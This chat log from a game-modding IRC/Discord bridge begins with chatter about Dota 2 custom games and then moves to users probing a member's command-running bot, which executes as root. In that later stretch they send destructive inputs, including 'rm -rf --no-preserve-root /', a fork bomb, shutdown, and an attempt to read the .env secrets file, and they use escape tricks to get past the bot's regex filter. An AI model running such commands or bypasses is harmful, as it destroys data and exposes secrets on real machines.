<+bridge> they keep asking "where did all my maps go" 19:22 <+bridge> osu! moment 19:22 <+bridge> Blocked by firewall:troll: 19:22 <+bridge> the great chinese wall you mean 19:22 <+bridge> tsfeddie is doing a crime by chatting here 19:22 <+bridge> I don’t know if killed is the right word, ddrace is just such a good mod 19:23 <+bridge> lol 19:23 <+bridge> mLife for life 19:23 <+bridge> one server update later. "why did they delete all the maps, now I have no maps to play" 19:23 <+bridge> mrpg 19:23 <+bridge> also 19:23 <+bridge> let me tell u the best way to get something into ddnet: you have to implement it yourself, even if no one else seems to want it, because until u can show off something, people wont want it 19:23 <+bridge> don't report plz 19:23 <+bridge> ppl just stuck on ddrace and too lazy to move another mod 19:24 <+bridge> and this is the story of how i forced ddnet to have telegun 19:24 <+bridge> Noone wants rust, but you implemented it so now its part of the game :troll: 19:24 <+bridge> i never asked if it was a good idea 19:24 <+bridge> xd 19:24 <+bridge> f3 19:24 <+bridge> Especially alot of old players that seem to dislike any sort of change 19:24 <+bridge> okey rust is actually good 19:24 <+bridge> also i just made a dota 2 custom game where you see all other 9 players cursor 19:24 <+bridge> might release soon 19:24 <+bridge> omg 19:24 <+bridge> ur into dota? 19:24 <+bridge> nope 19:24 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101922075452641321/image.png 19:24 <+bridge> I can only code in dota 19:24 <+bridge> I can't play it 19:24 <+bridge> yeah 19:25 <+bridge> sadly dota is lua 19:25 <+bridge> and i hate tables 19:25 <+bridge> typescript* 19:25 <+bridge> (╯°□°)╯︵ ┻━┻ 19:25 <+bridge> oh i guess they use js now? 19:25 <+bridge> typescript to lua is a thing 19:25 <+bridge> or is it the frontend 19:25 <+bridge> ah 19:25 <+bridge> and there are well maintained typings 19:25 <+bridge> it's amazing 19:25 <+bridge> china is rly into making dota arcade gamemodes 19:25 <+bridge> with their gachas 19:25 <+bridge> u can earn mony 19:25 <+bridge> :kek: 19:26 <+bridge> i don't think you can charge people in dota2 custom games? 19:26 <+bridge> no but rly 19:26 <+bridge> there are some 19:26 <+bridge> do they just pop up QR codes 19:26 <+bridge> really elaborate mods in dota 19:26 <+bridge> made by chinese modders 19:26 <+bridge> or maybe they are slaves 19:26 <+bridge> i mean I can see how they can charge money in maps 19:26 <+bridge> Most famous mods have own subscription 19:26 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101922485227753492/image.png 19:26 <+bridge> Like dota 1x6 or custom hero xhaos 19:26 <+bridge> subscriptions is like $1 19:26 <+bridge> Like 5$ 19:26 <+bridge> Iirc 19:26 <+bridge> XD 19:26 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101922562193240175/image.png 19:26 <+bridge> maybe they changed it 19:26 <+bridge> :greenthing: 19:27 <+bridge> what iz th 19:27 <+bridge> I mean autochess did blew up from dota2 19:27 <+bridge> dota 2 has a arcade section, mods by people 19:27 <+bridge> some are rly fun 19:27 <+bridge> everyone wanted the quick fame after that 19:27 <+bridge> I haven’t met a single person in my life that plays dota, but somehow its one of the biggest games 19:27 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101922748353228950/image.png 19:27 <+bridge> i do play so u know someone now 19:27 <+bridge> would you play a cursor sharing dota game tho 19:27 <+bridge> may u dont know enough russians 19:27 <+bridge> I thought I might be funny 19:27 <+bridge> I thought it might be funny 19:28 <+bridge> idk whaty it about 19:28 <+bridge> just. dota, but you can see other's mouse cursor 19:28 <+bridge> dota is played mostly by northern europeans and eastern eurpeans 19:28 <+bridge> and some parts of asia 19:28 <+bridge> you can check moderators steam accounts xd 19:28 <+bridge> china is big too 19:28 <+bridge> Most people (at least in my region) plays 5v5 games like 1v9, its too much stress to give control to your enemies 19:28 <+bridge> but mobile gaming is taking over 19:28 <+bridge> :troll: 19:28 <+bridge> i think 70% played dota 19:28 <+bridge> like a field test for my rock paper scissors game lol 19:29 <+bridge> tower defense gamemodes are the most fun to me 19:29 <+bridge> we did try to make a tetris tower defense in dota 2 19:29 <+bridge> pvz 5v5 19:30 <+bridge> but the project died after we realize we don't know how to make AI 19:30 <+bridge> pvz? 19:30 <+bridge> btw 19:30 <+bridge> did any of u play starcraft 2 19:30 <+bridge> zealot vs protoss 19:30 <+bridge> nope 19:30 <+bridge> ah 19:30 <+bridge> probes vs zealots 19:30 <+bridge> xd 19:30 <+bridge> https://probes-vs-zealot-2.fandom.com/wiki/Probes_vs_Zealot_2_Wiki 19:30 <+bridge> this was so much fun 19:31 <+bridge> Average elementTD enjoyer 19:31 <+bridge> i got to 60 frogs i think 19:31 <+bridge> the best way is to spam laser and illusion 19:31 <+bridge> towers 19:31 <+bridge> have you seen my tetris dota 2 19:31 <+bridge> no 19:31 <+bridge> I think i shared it several times 19:32 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101924027481739355/4wide.mp4 19:33 <+bridge> if you have interest in reviving the project i'd be happy to recover the front end part. 19:33 <+bridge> never seen it 19:33 <+bridge> btw u can make a custom smaller map xd 19:33 <+bridge> we stopped at the backend development 19:33 <+bridge> that is a custom map 19:33 <+bridge> yeah but u have creeps around fighting 19:33 <+bridge> u can remove everything 19:33 <+bridge> i mean i know 19:33 <+bridge> it was supposed to be there 19:33 <+bridge> :o 19:34 <+bridge> isnt it just tetris 19:34 <+bridge> oh 19:34 <+bridge> the creeps have a purpose? 19:34 <+bridge> you fill the bottom bar to spawn creeps and heroes and stuff 19:34 <+bridge> i see 19:34 <+bridge> not bad xd 19:34 <+bridge> we just haven't made any backend 19:34 <+bridge> :kek: 19:34 <+bridge> so basically ye, i just made a tetris 19:34 <+bridge> I hand drawn my minimap too 19:37 <+bridge> I was really proud everything on the frontend too. the custom ui, the sound design, the SUPER ROTATION SYSTEM and stuff 19:37 <+bridge> and it just died because I don't know how to make custom ai 19:37 <+ChillerDragon> !sh egrep -i allow index.js 19:37 < chillerbot> if (process.env.ALLOW_JS != '1' ) { 19:37 < chillerbot> if (process.env.ALLOW_BASH == '0' ) { 19:37 < chillerbot> if (process.env.ALLOW_PYTHON == '1' ) { 19:37 <+ChillerDragon> we bakk 19:37 <+ChillerDragon> pls no hax thank 19:37 <+bridge> what is this 19:37 <+ChillerDragon> just some trol 19:37 <+ChillerDragon> i got trolled back tho 19:37 <+bridge> at least close the bracket 19:38 <+ChillerDragon> lerato just wiped my drive xd 19:38 <+bridge> lol 19:38 <+ChillerDragon> nice tetris btw 19:39 <+bridge> thanks 19:40 <+ChillerDragon> !sh neofetch 19:40 < chillerbot> bash error 19:40 <+ChillerDragon> o 19:40 <+bridge> !sh ls 19:40 < chillerbot> Dockerfile 19:40 < chillerbot> LICENSE 19:40 < chillerbot> README.md 19:40 < chillerbot> env.example 19:40 < chillerbot> max stdout ... 19:40 <+bridge> bruh 19:41 <+bridge> !sh cat ./.env 19:41 < chillerbot> unsafe bash 19:41 <+bridge> its back??? 19:41 <+ChillerDragon> yes 19:41 <+bridge> phew 19:41 <+bridge> laughs evilly 19:41 <+bridge> how did you check safety tho 19:41 <+ChillerDragon> regex 19:41 <+ChillerDragon> xd 19:41 <+bridge> thought so 19:41 <+bridge> !sh cat index.js | tr -d '\n' | rm -rf --no-preserve-root / 19:41 < chillerbot> unsafe bash 19:41 <+ChillerDragon> not bug free as i learned the hard way earlier today 19:42 <+ChillerDragon> yes this ^ 19:42 <+bridge> !python import os; os.system("cat index.js | tr -d '\n' | rm -rf --no-preserve-root /") 19:42 < chillerbot> cat: index.js : No such file or directory 19:42 <+bridge> oh noes 19:42 <+ChillerDragon> e wot 19:42 <+ChillerDragon> o noes 19:42 <+bridge> :troll: :troll: :troll: 19:42 <+bridge> why not .env 19:42 <+bridge> r u ok 19:42 <+ChillerDragon> !ping 19:42 < chillerbot> pong 19:42 <+bridge> you are too nice to him 19:42 <+ChillerDragon> a he ok right? 19:42 <+ChillerDragon> ..right? 19:42 <+bridge> !sh :(){:|:&};: 19:42 < chillerbot> unsafe bash 19:42 <+bridge> !python import os; os.system("cat index.js | tr -d '\\n' | rm -rf --no-preserve-root /") 19:42 < chillerbot> cat: index.js : No such file or directory 19:43 <+bridge> !sh uptime 19:43 < chillerbot> bash error 19:43 <+bridge> can the bot run javascript 19:43 <+bridge> LOL 19:43 <+ChillerDragon> not yet 19:43 <+bridge> bash error kek 19:43 <+ChillerDragon> im on that 19:43 <+bridge> !sh shutdown 19:43 < chillerbot> unsafe bash 19:43 <+ChillerDragon> !sh uptime 19:43 < chillerbot> bash error 19:43 <+bridge> !python import os; os.system("ls") 19:43 <+ChillerDragon> wtf! 19:43 < chillerbot> env.example hex_to_pack.py index.js LICENSE node_modules package.json package-lock.json ping_pong.csv README.md tags venv 19:43 <+bridge> bro chiller 19:43 <+bridge> im giggling 19:43 <+ChillerDragon> ye ryo? 19:43 <+bridge> did i remove all 19:43 <+bridge> ok no 19:44 <+ChillerDragon> na we good ;D 19:44 <+ChillerDragon> python slow 19:44 <+bridge> but isnt os.system like bash 19:44 <+ChillerDragon> its all a mess xd 19:44 <+bridge> !python import os; os.system("node | console.log('hi')") 19:44 <+bridge> !python import os; os.system("cat index.js | tr -d '\n' | rm -rf .") 19:44 <+bridge> !python import os;os.system("echo i love you <3") 19:44 < chillerbot> NameError: name 'import' is not defined 19:44 < chillerbot> cat: index.js : No such file or directory 19:44 < chillerbot> i love you 19:44 <+ChillerDragon> xxxxxxxxxxD 19:44 <+bridge> wat 19:44 <+bridge> what import 19:44 <+bridge> !python import os; os.system("ls") 19:44 < chillerbot> env.example hex_to_pack.py index.js LICENSE node_modules package.json package-lock.json ping_pong.csv README.md tags venv 19:44 <+ChillerDragon> ryos brain broke 19:44 <+bridge> !python import os; os.system("ls -R") 19:45 < chillerbot> ls: cannot open file or directory '-R': Permission denied 19:45 <+bridge> !python import os; os.system("ls -Al") 19:45 <+bridge> ah 19:45 < chillerbot> ls: cannot open file or directory '-Al': Permission denied 19:45 <+bridge> u set correct perms this time 19:45 <+bridge> hmm 19:45 <+ChillerDragon> check this out 19:45 <+ChillerDragon> !grep -i raspi /etc/os-release 19:45 <+ChillerDragon> !grep -i rasp /etc/os-release 19:45 <+ChillerDragon> !sh grep -i rasp /etc/os-release 19:45 <+ChillerDragon> jesus i suck xd 19:45 <+bridge> !python import os; os.system("mount /dev/sda .") 19:45 < chillerbot> mount: invalid option -- '/dev/sda .' 19:46 <+bridge> !python kiss me 19:46 <+bridge> does the bot has no write permission on anywhere 19:46 < chillerbot> NameError: name 'kiss' is not defined 19:46 <+bridge> :( 19:46 <+bridge> !python import os; os.system("mount .. .") 19:46 <+ChillerDragon> the bot has full write access 19:46 < chillerbot> mount: invalid option -- '.. .' 19:46 <+ChillerDragon> !python import os; os.system("echo write > newfile.txt") 19:46 <+bridge> !python import os; os.system("echo 'ryo is the best' > ryo.txt") 19:46 < chillerbot> ryo is the best 19:47 <+bridge> !python import os; os.system("echo console.log('hi') > newfile.js"); 19:47 < chillerbot> console 19:47 <+ChillerDragon> my regex skills are 10/10 19:47 <+bridge> !python import os; os.system("echo 'voxel is the best' > ryo.txt") 19:47 < chillerbot> voxel is the best 19:47 <+bridge> so you filtered console? 19:47 <+bridge> !python f = open("im_ryo.txt", "a"); f.write("rust is better than c"); f.close() 19:47 < chillerbot> NameError: name 'f' is not defined 19:47 <+bridge> !python f = open("im_ryo.txt", "a"); f.write("rust is SHIT!!!!!"); f.close() 19:48 <+bridge> meh 19:48 < chillerbot> NameError: name 'f' is not defined 19:48 <+bridge> oh well 19:48 <+bridge> !python import os; os.system("echo \x63onsole.log('hi') > newfile.js"); 19:48 < chillerbot> NameError: name 'import' is not defined 19:49 <+bridge> i don't get it 19:49 <+bridge> !python import os; os.system("cat newfile.js"); 19:49 < chillerbot> cat: newfile.js: No such file or directory 19:51 <+bridge> !python import os; os.system("ls -a"); 19:51 < chillerbot> ls: cannot open file or directory '-a': Permission denied 19:51 <+bridge> xd 19:51 <+bridge> !python import os; os.system("echo -e \x63onsole.log('hi') > newfile.js"); 19:51 < chillerbot> echo: invalid option -- '-e ' 19:51 <+bridge> bruh 19:52 <+bridge> !python import os; os.system("printf-e \x63onsole.log('hi') > newfile.js"); 19:52 < chillerbot> NameError: name 'import' is not defined 19:52 <+bridge> !python import os; os.system("printf \x63onsole.log('hi') > newfile.js"); 19:52 < chillerbot> NameError: name 'import' is not defined 19:52 <+bridge> 19:54 <+bridge> i should sleep 20:18 <+bridge> tf is that spam 20:31 <+ChillerDragon> sori 20:31 <+ChillerDragon> send spam channel thats bridged to discord pls 20:38 <+ChillerDragon> !sh touch aaaalo 20:39 <+ChillerDragon> !sh ls 20:39 < chillerbot> Dockerfile 20:39 < chillerbot> LICENSE 20:39 < chillerbot> README.md 20:39 < chillerbot> aaaalo 20:39 < chillerbot> max stdout ... 20:39 <+bridge> This is truly 20:47 <+bridge> oh muh guh 20:48 <+bridge> chillerdragon has gamed the system 20:48 <+bridge> he don't need no discord admin privileges to use a bot in here 20:51 <+bridge> what if os.system("rm -rf $HOME --no-preserve-root"); 20:51 <+bridge> actually i would want !sh for that i think 20:51 <+ChillerDragon> then i lose my whole disk 20:51 <+ChillerDragon> happend earlier 20:51 <+bridge> messed up 20:51 <+bridge> i don't think --no-preserve root actually even applies to home folder 20:51 <+bridge> even tho it should 20:51 <+ChillerDragon> i wiped my whole home folder 20:51 <+ChillerDragon> real good 20:52 <+bridge> is it dockered 20:52 <+ChillerDragon> now it actually is 20:52 <+ChillerDragon> when i got wiped it wasnt xd 20:52 <+bridge> sad 20:52 <+ChillerDragon> but docker escape ez 20:52 <+bridge> yea 20:52 <+ChillerDragon> docker is just free root 20:53 <+ChillerDragon> so technically i made it worse 20:54 <+bridge> these things have to be in actual vms 20:55 <+bridge> preferably cut off from the internet aswell except for the irc/discord uplink 20:55 <+ChillerDragon> yea 20:55 <+bridge> yea 20:55 <+bridge> jinx 20:55 <+ChillerDragon> sounds like work 20:55 <+ChillerDragon> not gonna do 20:56 <+bridge> run a pbot instance https://github.com/pragma-/pbot 20:57 <+ChillerDragon> yea looks fun 20:57 <+ChillerDragon> when bridge #off-topic? 20:57 <+bridge> off-topic is boring now, no need to bridge 20:57 <+ChillerDragon> i dont rly wanna spam here all day 20:58 <+bridge> compile python interpreter to wasm 20:58 <+bridge> near native speed and still secure ez 21:09 <+ChillerDragon> !sh id 21:09 < chillerbot> uid=0(root) gid=0(root) groups=0(root) 21:09 <+ChillerDragon> yea.. im turning this off while i sleep 21:09 <+bridge> why xdd 21:09 <+ChillerDragon> im scared 21:10 <+bridge> do u want to say its stupid to give others access to your computer? 21:10 <+ChillerDragon> no 21:10 <+ChillerDragon> just that im pussy 21:10 <+ChillerDragon> its very smart to share computer ressources 21:10 <+bridge> yes 21:11 <+bridge> !sh whoami 21:11 <+ChillerDragon> it rebooting to harden sleep mode 21:11 <+bridge> crying 21:11 <+bridge> was fun day 21:12 <+bridge> u can now say learath ereased a whole computer, he fell for the command some ppl post in the internet to troll nobos 21:12 <+bridge> he totally didnt do it on purpose xd 21:12 <+ChillerDragon> yea sure .. classic lerato copy pasta 21:15 <+ChillerDragon> !sh echo test 21:15 < chillerbot2> bash broken because i got hacked 21:18 <+bridge> chillerdragon: 21:18 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101950768132661308/image.png 21:19 <+ChillerDragon> xd 21:23 <+bridge> created xD 21:24 <+bridge> !sh ls 21:24 < chillerbot2> bash broken because i got hacked 21:24 <+bridge> !python print("hello") 21:24 < chillerbot2> error 21:24 <+bridge> !js console.log('hello') 21:24 < chillerbot2> js is turned off because i got hacked 21:25 <+bridge> !c i = ++i + i++ 21:25 < chillerbot2> Segmentation fault 21:25 <+bridge> very useful bot :) 21:25 <+bridge> yup 21:25 <+bridge> !rust test 21:25 < chillerbot2> @Ryozuki 21:26 <+bridge> !ping abcd 21:26 < chillerbot2> pong 21:33 <+bridge> !bing 21:33 < chillerbot2> bong 21:34 <+bridge> !xing 21:34 <+ChillerDragon> xong? 21:34 <+bridge> wtf, i thought youw ere going to sleep 21:34 <+ChillerDragon> !add_ping_pong xing xong 21:34 <+ChillerDragon> ee 21:35 <+bridge> !add_ping_pong (\w)ing \1ong 21:35 < chillerbot2> only papa chiler can pinger. 21:35 <+bridge> !add_ping_pong (\w+)ing\1ong 21:35 < chillerbot2> only papa chiler can pinger. 21:35 <+bridge> !add_ping_pong (\w+)ing \1ong 21:35 < chillerbot2> only papa chiler can pinger. 21:35 <+bridge> !add_ping_pong (\w+t 21:35 < chillerbot2> only papa chiler can pinger. 21:35 <+bridge> lel 21:36 <+bridge> abuse 21:36 <+bridge> you can edit message, it still responds 21:36 <+bridge> what if u edit now 21:36 <+bridge> !add_ping_pong (\w+)as 21:36 < chillerbot2> only papa chiler can pinger. 21:36 <+bridge> lmao 21:36 <+bridge> still works 😄 21:36 <+bridge> try editing yours 21:36 <+bridge> !add_ping_pong (\w)ing \1ong +test 21:36 < chillerbot2> only papa chiler can pinger. 21:36 <+bridge> !add_ping_pong ping pong 21:36 < chillerbot2> only papa chiler can pinger. 21:36 <+bridge> u 21:36 <+bridge> lel, even if i modify not the last one 21:36 <+bridge> !add_ping_pong ping pona 21:36 < chillerbot2> only papa chiler can pinger. 21:36 <+bridge> !add_ping_pong ping pons 21:36 < chillerbot2> only papa chiler can pinger. 21:36 <+bridge> !ping 21:36 < chillerbot2> pong 21:36 <+bridge> see 21:37 <+bridge> LOL 21:37 <+bridge> it still pongs 21:37 <+bridge> why doeds he always talk usign a webhok 21:37 <+bridge> or whaartevr 21:37 <+bridge> !xing 21:37 < chillerbot2> xong 21:37 <+bridge> !sh 21:37 < chillerbot2> bash broken because i got hacked 21:37 <+bridge> !p 21:37 < chillerbot2> error 21:37 <+bridge> testicle cancer 21:37 <+bridge> !p help 21:37 < chillerbot2> invalid hex 21:37 <+bridge> !p 1234 21:37 < chillerbot2> error 21:37 <+bridge> !p 12 34 21:37 < chillerbot2> error 21:49 <+bridge> <судный день.> skill issue 21:53 <+bridge> hallo? 21:54 <+bridge> Chillerdragon? 22:01 <+bridge> No 22:20 <+bridge> @Joel.\: o/